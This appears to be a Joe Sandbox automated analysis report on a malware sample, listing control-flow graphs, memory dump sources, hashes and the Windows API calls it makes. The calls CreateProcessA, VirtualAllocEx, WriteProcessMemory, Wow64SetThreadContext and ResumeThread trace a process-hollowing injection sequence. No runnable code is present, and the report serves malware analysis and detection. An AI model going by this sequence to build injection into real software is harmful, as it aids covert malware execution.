                                  control_flow_graph 1730 72c2ac7-72c2ad0 1731 72c2aa5-72c2aaa 1730->1731 1732 72c2ad2-72c2ae7 1730->1732 1733 72c2aef-72c2af1 1732->1733 1734 72c2b0b-72c2b78 call 72c20d8 1733->1734 1735 72c2af3-72c2b08 1733->1735 1744 72c2b7e-72c2b80 1734->1744 1745 72c2c24-72c2c3b 1734->1745 1746 72c2b86-72c2b91 call 72c22f0 1744->1746 1747 72c2cb0-72c2d57 1744->1747 1755 72c2c3d-72c2c3f 1745->1755 1756 72c2c41 1745->1756 1753 72c2bae-72c2bb2 1746->1753 1754 72c2b93-72c2b95 1746->1754 1786 72c2d59-72c2d5f 1747->1786 1787 72c2d60-72c2d81 1747->1787 1759 72c2bb4-72c2bc8 call 72c2418 1753->1759 1760 72c2c11-72c2c1a 1753->1760 1757 72c2b97-72c2b9e 1754->1757 1758 72c2ba0-72c2bab call 72c16cc 1754->1758 1762 72c2c46-72c2c48 1755->1762 1756->1762 1757->1753 1758->1753 1770 72c2bde-72c2be2 1759->1770 1771 72c2bca-72c2bdb call 72c16cc 1759->1771 1765 72c2c7d-72c2ca9 1762->1765 1766 72c2c4a-72c2c76 1762->1766 1765->1747 1766->1765 1775 72c2bea-72c2c03 1770->1775 1776 72c2be4 1770->1776 1771->1770 1782 72c2c0e 1775->1782 1783 72c2c05 1775->1783 1776->1775 1782->1760 1783->1782 1786->1787
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (q$Hq
                                  • API String ID: 0-1154169777
                                  • Opcode ID: ba8e12b14d618256ce361025e457cdefdcdc8534047b0b4be276bbe3ca36a615
                                  • Instruction ID: 8bb7a3a3fcab61704cbf86085d60f2c2240f70130abd8334fe632ec63b196794
                                  • Opcode Fuzzy Hash: ba8e12b14d618256ce361025e457cdefdcdc8534047b0b4be276bbe3ca36a615
                                  • Instruction Fuzzy Hash: A181C0B1A10215CFEB14DF69E8047AEBBF6FBD9210F14852EE405A7241DF389D05CBA5

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1793 72c82d0-72c82dc 1794 72c82de-72c8335 call 72c839f 1793->1794 1795 72c8333 1793->1795 1797 72c833b-72c833d 1794->1797 1795->1794 1801 72c82fc-72c830b 1797->1801 1802 72c82e6-72c82ec 1797->1802 1803 72c830d-72c831a 1801->1803 1804 72c833f-72c851f 1801->1804 1805 72c82ee 1802->1805 1806 72c82f0-72c82f2 1802->1806 1803->1804 1807 72c831c-72c8332 1803->1807 1805->1801 1806->1801
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $q$$q
                                  • API String ID: 0-3126353813
                                  • Opcode ID: f4d9ee32ce749d097e62c65841232ccc2dea0176f569b4330462d8e93461c51f
                                  • Instruction ID: 6d9ede3fd239697066e5951daddca550e131f5bd01da73d991e20378a0b78920
                                  • Opcode Fuzzy Hash: f4d9ee32ce749d097e62c65841232ccc2dea0176f569b4330462d8e93461c51f
                                  • Instruction Fuzzy Hash: 161190B0A39296CFC311DB24C909265BBB4BB16241F05C3EFD409DB142D7B48942C7AA

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1951 7605cdc-7605d7d 1954 7605db6-7605dd6 1951->1954 1955 7605d7f-7605d89 1951->1955 1960 7605dd8-7605de2 1954->1960 1961 7605e0f-7605e3e 1954->1961 1955->1954 1956 7605d8b-7605d8d 1955->1956 1958 7605db0-7605db3 1956->1958 1959 7605d8f-7605d99 1956->1959 1958->1954 1962 7605d9b 1959->1962 1963 7605d9d-7605dac 1959->1963 1960->1961 1964 7605de4-7605de6 1960->1964 1971 7605e40-7605e4a 1961->1971 1972 7605e77-7605f31 CreateProcessA 1961->1972 1962->1963 1963->1963 1965 7605dae 1963->1965 1966 7605de8-7605df2 1964->1966 1967 7605e09-7605e0c 1964->1967 1965->1958 1969 7605df4 1966->1969 1970 7605df6-7605e05 1966->1970 1967->1961 1969->1970 1970->1970 1973 7605e07 1970->1973 1971->1972 1974 7605e4c-7605e4e 1971->1974 1983 7605f33-7605f39 1972->1983 1984 7605f3a-7605fc0 1972->1984 1973->1967 1976 7605e50-7605e5a 1974->1976 1977 7605e71-7605e74 1974->1977 1978 7605e5c 1976->1978 1979 7605e5e-7605e6d 1976->1979 1977->1972 1978->1979 1979->1979 1980 7605e6f 1979->1980 1980->1977 1983->1984 1994 7605fd0-7605fd4 1984->1994 1995 7605fc2-7605fc6 1984->1995 1996 7605fe4-7605fe8 1994->1996 1997 7605fd6-7605fda 1994->1997 1995->1994 1998 7605fc8 1995->1998 2000 7605ff8-7605ffc 1996->2000 2001 7605fea-7605fee 1996->2001 1997->1996 1999 7605fdc 1997->1999 1998->1994 1999->1996 2003 760600e-7606015 2000->2003 2004 7605ffe-7606004 2000->2004 2001->2000 2002 7605ff0 2001->2002 2002->2000 2005 7606017-7606026 2003->2005 2006 760602c 2003->2006 2004->2003 2005->2006 2007 760602d 2006->2007 2007->2007
                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07605F1E
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1595247212.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_7600000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: 23ee38d065a4e927db27f03375ba76cfb7e9dff51940cc6d5ee1090cdddc60d9
                                  • Instruction ID: 265247a7812a02fb540299957a3ec90c65d12a3c9c924e8279acd6956888f1c9
                                  • Opcode Fuzzy Hash: 23ee38d065a4e927db27f03375ba76cfb7e9dff51940cc6d5ee1090cdddc60d9
                                  • Instruction Fuzzy Hash: 1FA14FB1D00219CFEF24DF68C845BEEBBB2BF44314F148169E85AA7281DB749991CF91

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2009 7605ce8-7605d7d 2011 7605db6-7605dd6 2009->2011 2012 7605d7f-7605d89 2009->2012 2017 7605dd8-7605de2 2011->2017 2018 7605e0f-7605e3e 2011->2018 2012->2011 2013 7605d8b-7605d8d 2012->2013 2015 7605db0-7605db3 2013->2015 2016 7605d8f-7605d99 2013->2016 2015->2011 2019 7605d9b 2016->2019 2020 7605d9d-7605dac 2016->2020 2017->2018 2021 7605de4-7605de6 2017->2021 2028 7605e40-7605e4a 2018->2028 2029 7605e77-7605f31 CreateProcessA 2018->2029 2019->2020 2020->2020 2022 7605dae 2020->2022 2023 7605de8-7605df2 2021->2023 2024 7605e09-7605e0c 2021->2024 2022->2015 2026 7605df4 2023->2026 2027 7605df6-7605e05 2023->2027 2024->2018 2026->2027 2027->2027 2030 7605e07 2027->2030 2028->2029 2031 7605e4c-7605e4e 2028->2031 2040 7605f33-7605f39 2029->2040 2041 7605f3a-7605fc0 2029->2041 2030->2024 2033 7605e50-7605e5a 2031->2033 2034 7605e71-7605e74 2031->2034 2035 7605e5c 2033->2035 2036 7605e5e-7605e6d 2033->2036 2034->2029 2035->2036 2036->2036 2037 7605e6f 2036->2037 2037->2034 2040->2041 2051 7605fd0-7605fd4 2041->2051 2052 7605fc2-7605fc6 2041->2052 2053 7605fe4-7605fe8 2051->2053 2054 7605fd6-7605fda 2051->2054 2052->2051 2055 7605fc8 2052->2055 2057 7605ff8-7605ffc 2053->2057 2058 7605fea-7605fee 2053->2058 2054->2053 2056 7605fdc 2054->2056 2055->2051 2056->2053 2060 760600e-7606015 2057->2060 2061 7605ffe-7606004 2057->2061 2058->2057 2059 7605ff0 2058->2059 2059->2057 2062 7606017-7606026 2060->2062 2063 760602c 2060->2063 2061->2060 2062->2063 2064 760602d 2063->2064 2064->2064
                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07605F1E
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1595247212.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_7600000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: b5b76d3e6d538e5503f0c2baba6d00cc1ff8b52825630631db2eaee4d3240948
                                  • Instruction ID: ba73bb8f395b1a7f57b10dd5e564e8359ff69255dbc23f64eb3a7ba8ec9fceb6
                                  • Opcode Fuzzy Hash: b5b76d3e6d538e5503f0c2baba6d00cc1ff8b52825630631db2eaee4d3240948
                                  • Instruction Fuzzy Hash: 68914DB1D00219CFEF24DF68C845BEEBBB2BF44314F148169E85AA7281DB749991CF91

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2066 b9b300-b9b302 2067 b9b304 2066->2067 2068 b9b306-b9b308 2066->2068 2067->2068 2069 b9b30a 2068->2069 2070 b9b2b5-b9b2dd 2068->2070 2072 b9b30c-b9b30d 2069->2072 2073 b9b30e 2069->2073 2079 b9b2ec-b9b2f4 2070->2079 2080 b9b2df-b9b2ea 2070->2080 2072->2073 2074 b9b310-b9b311 2073->2074 2075 b9b312-b9b31f 2073->2075 2074->2075 2076 b9b34b-b9b34f 2075->2076 2077 b9b321-b9b32e call b9acc4 2075->2077 2082 b9b351-b9b35b 2076->2082 2083 b9b363-b9b3a4 2076->2083 2086 b9b330 2077->2086 2087 b9b344 2077->2087 2084 b9b2f7-b9b2fc 2079->2084 2080->2084 2082->2083 2090 b9b3b1-b9b3bf 2083->2090 2091 b9b3a6-b9b3ae 2083->2091 2137 b9b336 call b9b5a8 2086->2137 2138 b9b336 call b9b598 2086->2138 2139 b9b336 call b9b5fc 2086->2139 2087->2076 2092 b9b3c1-b9b3c6 2090->2092 2093 b9b3e3-b9b3e5 2090->2093 2091->2090 2095 b9b3c8-b9b3cf call b9acd0 2092->2095 2096 b9b3d1 2092->2096 2098 b9b3e8-b9b3ef 2093->2098 2094 b9b33c-b9b33e 2094->2087 2097 b9b480-b9b4fa 2094->2097 2100 b9b3d3-b9b3e1 2095->2100 2096->2100 2129 b9b4fc 2097->2129 2130 b9b4fe-b9b540 2097->2130 2101 b9b3fc-b9b403 2098->2101 2102 b9b3f1-b9b3f9 2098->2102 2100->2098 2104 b9b410-b9b419 call b9ace0 2101->2104 2105 b9b405-b9b40d 2101->2105 2102->2101 2110 b9b41b-b9b423 2104->2110 2111 b9b426-b9b42b 2104->2111 2105->2104 2110->2111 2112 b9b449-b9b44d 2111->2112 2113 b9b42d-b9b434 2111->2113 2140 b9b450 call b9b879 2112->2140 2141 b9b450 call b9b888 2112->2141 2113->2112 2115 b9b436-b9b446 call b9acf0 call b9ad00 2113->2115 2115->2112 2118 b9b453-b9b456 2120 b9b479-b9b47f 2118->2120 2121 b9b458-b9b476 2118->2121 2121->2120 2129->2130 2132 b9b548-b9b573 GetModuleHandleW 2130->2132 2133 b9b542-b9b545 2130->2133 2134 b9b57c-b9b590 2132->2134 2135 b9b575-b9b57b 2132->2135 2133->2132 2135->2134 2137->2094 2138->2094 2139->2094 2140->2118 2141->2118
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00B9B566
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1514498924.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_b90000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 7b3dc833ddb23f2503f2243c07aff0785dff7c15591f2640276116752719286d
                                  • Instruction ID: 776ab36f75ecf8f446123500efabb8b4d6ce18c173ea4a166fbaf2a319a7054e
                                  • Opcode Fuzzy Hash: 7b3dc833ddb23f2503f2243c07aff0785dff7c15591f2640276116752719286d
                                  • Instruction Fuzzy Hash: 57915670A00B448FDB25CF2AE551B5ABBF1FF88300F10896AE086CBB51D735E809CB95
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 00B959C9
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1514498924.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_b90000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: c507e2092b1d3096f4be55173b248728f3302e4c199b9b070ac66450bb1217fa
                                  • Instruction ID: f5d3fa1322dff139dca9943f026ab0fd844957aef5b4f625bfb591d9053a938d
                                  • Opcode Fuzzy Hash: c507e2092b1d3096f4be55173b248728f3302e4c199b9b070ac66450bb1217fa
                                  • Instruction Fuzzy Hash: 1741F171C00718CBEF29CFAAC88479DBBF5BF49304F2080AAD408AB255D7716946CF54
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1514498924.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_b90000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 37d031b63c0c6c7ce20604daf83da9f47f1d901f54a113e50fecd3d9ae5a8f98
                                  • Instruction ID: 75331bafbeb78a263d5e093480282a0ee34bef1a63aef6bd1e0802a6cdc318b6
                                  • Opcode Fuzzy Hash: 37d031b63c0c6c7ce20604daf83da9f47f1d901f54a113e50fecd3d9ae5a8f98
                                  • Instruction Fuzzy Hash: 4E31BF71845B48CFEF26CFA8C8857DDBBF0EF46324F2081AAC006AB252C7759946CB15
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 00B959C9
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1514498924.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_b90000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: 7241d2c2761feda68f8f1ee7fc0817175f3309e77e7d5e6f0e95ce9baf5040bd
                                  • Instruction ID: 0ab3f82558d4baa5ac59ebf47bd4a60ff9e4084e9badbdaf389dcb0ab5055859
                                  • Opcode Fuzzy Hash: 7241d2c2761feda68f8f1ee7fc0817175f3309e77e7d5e6f0e95ce9baf5040bd
                                  • Instruction Fuzzy Hash: BD41E070C00719CBEF25CFAAC88478EBBF5BF48304F20806AD408AB251D7756945CF94
                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07605AF0
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1595247212.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_7600000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: d9cf943b79b6f59974c6720cc43dc9351016587fdb54052a8e727e4cc10292d8
                                  • Instruction ID: 52b0dcc21069bff6b57c4fe8fdbbaefdaefdb599707840e3ca6769f86b1dbab4
                                  • Opcode Fuzzy Hash: d9cf943b79b6f59974c6720cc43dc9351016587fdb54052a8e727e4cc10292d8
                                  • Instruction Fuzzy Hash: EC214BB59003499FDB14CFA9C880BEEBBF5FF48310F10842AE519A7741D7799550CBA4
                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07605AF0
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1595247212.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_7600000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: 2058c2cba835577191ef3b25ba8f141929d63395a01991750d3870a7085d81bf
                                  • Instruction ID: 4c29f3b67006aeba5c3635553469fda630157dbdfd0eb2ee1b5dd6c8de06b42a
                                  • Opcode Fuzzy Hash: 2058c2cba835577191ef3b25ba8f141929d63395a01991750d3870a7085d81bf
                                  • Instruction Fuzzy Hash: E92126B59003599FDB14CFAAC880BEEBBF5FF48310F10842AE919A7341D7789950CBA4
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B9D84F
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1514498924.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_b90000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: f009c9b0ab06232f646881751389b57216a164adc7dd25d275a809c09d05eb2a
                                  • Instruction ID: 1a251b52eac135263beda074977b0e3f3a4c61658e2ccd7adfeeeae5b9ef74bb
                                  • Opcode Fuzzy Hash: f009c9b0ab06232f646881751389b57216a164adc7dd25d275a809c09d05eb2a
                                  • Instruction Fuzzy Hash: 3C21D4B5900248AFDB10CFAAD484ADEBBF5FB48310F14806AE918A7351D379A944CFA5
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07605946
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1595247212.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_7600000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: ad499cb058a5ba6ffbc4d0532c30ffecd5b45858364706c39b11bcdc4f3cce9a
                                  • Instruction ID: 38285b8913e94d151b5a1f3289087c96e5ba8b06fbed69480a113abaa7882bb2
                                  • Opcode Fuzzy Hash: ad499cb058a5ba6ffbc4d0532c30ffecd5b45858364706c39b11bcdc4f3cce9a
                                  • Instruction Fuzzy Hash: 3C215C75D003098FDB14DFAAC441BEEBBF4EF48220F10842AD559A7781CB789944CFA5
                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07605BD0
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1595247212.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_7600000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: 75c783db2b3197fdceddf20452e6a1917d0e7c661fe6e8b6153faf1cfc815e8c
                                  • Instruction ID: bffbc6299a8281a3259342af858df641539cc7f1eac973ae5df026f140d983d6
                                  • Opcode Fuzzy Hash: 75c783db2b3197fdceddf20452e6a1917d0e7c661fe6e8b6153faf1cfc815e8c
                                  • Instruction Fuzzy Hash: A82136B2C003499FDB14DFAAC840BEEBBF1FF48310F10842AE519A7240D7399941CBA4
                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07605BD0
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1595247212.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_7600000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: 5e7d510e7d6e7ef2050b0a69ce799eb2995a484a3f35c5d5f2075e33b86f3a31
                                  • Instruction ID: 294115360ede231f133c39d12c2a3f774dce66e7cb0fdf666ad56632b73af5dc
                                  • Opcode Fuzzy Hash: 5e7d510e7d6e7ef2050b0a69ce799eb2995a484a3f35c5d5f2075e33b86f3a31
                                  • Instruction Fuzzy Hash: FA2116B1C003499FDB14CFAAC840BEEBBF5FF48310F10842AE519A7240D779A550CBA5
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07605946
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1595247212.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_7600000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: 554c48383a32bf6285046b17431390ffc5ed37c52d68edeeceb393eb6b157a7b
                                  • Instruction ID: 240d6a262b0829808db3e56fd6f7b88b5a6d3f60f72ccc3ab191ce84a1a259fd
                                  • Opcode Fuzzy Hash: 554c48383a32bf6285046b17431390ffc5ed37c52d68edeeceb393eb6b157a7b
                                  • Instruction Fuzzy Hash: 9D2138B1D003098FDB14DFAAC484BEEBBF4EF48220F14842AD559A7341CB789945CFA5
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B9D84F
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1514498924.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_b90000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: c701b3955a5e9e45d60b4df9ca9a5e34ef9df4bb07b3ed1fa170ddae6244327c
                                  • Instruction ID: f638daa0976f102db9b9645fa41d5551041ad21b9bef5376de1b867cbc8e9e21
                                  • Opcode Fuzzy Hash: c701b3955a5e9e45d60b4df9ca9a5e34ef9df4bb07b3ed1fa170ddae6244327c
                                  • Instruction Fuzzy Hash: 2B21E4B5D00248DFDB10CFAAD484ADEBBF4FB48310F14805AE918A7350D378A940CFA5
                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07605A0E
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1595247212.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_7600000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 0c0f4aab1db397861c3779acf21c2711ad2ccbde89b3d0c29b67579d5f9570e7
                                  • Instruction ID: db886332ae37abcc7285845568e53388818701859a01b56f57e1214fb0356d6b
                                  • Opcode Fuzzy Hash: 0c0f4aab1db397861c3779acf21c2711ad2ccbde89b3d0c29b67579d5f9570e7
                                  • Instruction Fuzzy Hash: 861158768003489FDB24CFAAC844BEEBBF5EF48320F10841AE515A7640CB769550CBA4
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1595247212.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_7600000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 43a9ae060165739190f5b94082cc0863af5780de4883c01e931e439b5dcb617b
                                  • Instruction ID: a314430ed88dcc7e5075c75ff695399abc1d1a60ab3e3d25745f9832bf798867
                                  • Opcode Fuzzy Hash: 43a9ae060165739190f5b94082cc0863af5780de4883c01e931e439b5dcb617b
                                  • Instruction Fuzzy Hash: 311149B5D003488FDB24DFAAD4457EEFBF4EB88320F14841AD519A7640CA75A9448FA5
                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07605A0E
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1595247212.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_7600000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 574acb67c6cbe5bdbf63bed1408ac3da590dae1881bc5fdc576006632f51f233
                                  • Instruction ID: f2fadab5d176929d88f49e5b3a798e8b7f566a794f0c4e65b18eda5f4e8d08f8
                                  • Opcode Fuzzy Hash: 574acb67c6cbe5bdbf63bed1408ac3da590dae1881bc5fdc576006632f51f233
                                  • Instruction Fuzzy Hash: 761167728003489FDB24CFAAC844BEFBBF5EF48310F108819E516A7250CB75A950CFA4
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1595247212.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_7600000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 140227edc9c209d1b2cb8a2f7d091b16e5b6d04ccddbe60c5746dff5f78cd291
                                  • Instruction ID: d6667d8be5b3afc664417394ca299d5aae1df1e3b1856bf164dac00e9cd4ccbf
                                  • Opcode Fuzzy Hash: 140227edc9c209d1b2cb8a2f7d091b16e5b6d04ccddbe60c5746dff5f78cd291
                                  • Instruction Fuzzy Hash: 5D1128B1D003488FDB24DFAAC444BEFFBF5EF88210F148419D519A7240CA79A940CFA5
                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 0760911D
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1595247212.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_7600000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: 03340ca165fe831770d45c99cf47841eed0d43574374afdb30bce1f57fc7f3a9
                                  • Instruction ID: 5fc3c176602c3d9b801124587962a0b00c5fa45f7988865babc0fd708768d1b1
                                  • Opcode Fuzzy Hash: 03340ca165fe831770d45c99cf47841eed0d43574374afdb30bce1f57fc7f3a9
                                  • Instruction Fuzzy Hash: 321113B5800308DFDB20DF9AD885BDEFBF8EB48320F20844AE514A7640C375A544CFA5
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00B9B566
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1514498924.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_b90000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 15c80e03017e39f0a13cb307dd0697e736ee41dd2051b251de0f3f6177fa6c78
                                  • Instruction ID: f9f48cfff2e29a8a71ee042243648e76df64103f3fac24e34959876f8a058589
                                  • Opcode Fuzzy Hash: 15c80e03017e39f0a13cb307dd0697e736ee41dd2051b251de0f3f6177fa6c78
                                  • Instruction Fuzzy Hash: 28110FB6C00249CFDB24CF9AD544ADEFBF4EB88310F11846AD418A7210C379A545CFA5
                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 0760911D
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1595247212.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_7600000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: 777c67c1f330364e82801a17ed21cfa918d499d62be99f47fe90d15674dd2a28
                                  • Instruction ID: 1575975aac697018cd0357321370982622816b6f92fce7e7d6a57b192be3f8ad
                                  • Opcode Fuzzy Hash: 777c67c1f330364e82801a17ed21cfa918d499d62be99f47fe90d15674dd2a28
                                  • Instruction Fuzzy Hash: D611F2B5900349DFDB20DF9AC849BDEBBF8EB48320F108459E519A7341C375A944CFA5
